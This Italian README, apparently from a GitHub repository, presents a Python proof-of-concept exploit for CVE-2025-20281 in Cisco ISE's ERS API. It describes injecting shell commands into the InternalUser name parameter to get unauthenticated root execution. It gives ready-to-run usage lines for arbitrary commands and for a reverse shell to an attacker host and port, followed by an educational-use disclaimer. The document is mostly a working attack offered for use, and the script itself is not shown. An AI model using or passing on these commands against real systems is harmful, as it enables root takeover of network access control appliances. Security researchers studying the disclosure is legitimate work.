
Exploit di esecuzione di codice remoto non autenticato per CVE-2025-20281 nell'API ERS di Cisco ISE. Esegui comandi o avvia reverse shell come root — nessuna autenticazione richiesta.
Questo repository contiene un proof-of-concept in Python 3 per CVE-2025-20281, una vulnerabilità critica in Cisco Identity Services Engine (ISE) che consente esecuzione di codice remoto non autenticata (RCE) come root tramite l'API ERS.
L'endpoint
/ers/sdk#_di Cisco ISE ERS non convalida l'autenticazione durante l'elaborazione delle richieste di creazione utente.
Iniettando comandi shell nel parametronamedell'oggettoInternalUser, gli aggressori possono ottenere l'esecuzione di comandi come root.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Test comando:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Esegui comando personalizzato:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Reverse shell:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Disclaimer legale
Questo codice è fornito esclusivamente a scopo educativo e di test autorizzato. Non utilizzare questo software contro reti o sistemi di cui non sei proprietario o per i quali non hai autorizzazione al test.
Vulnerabilità: Divulgata tramite advisory Cisco
Refactoring PoC: illdeed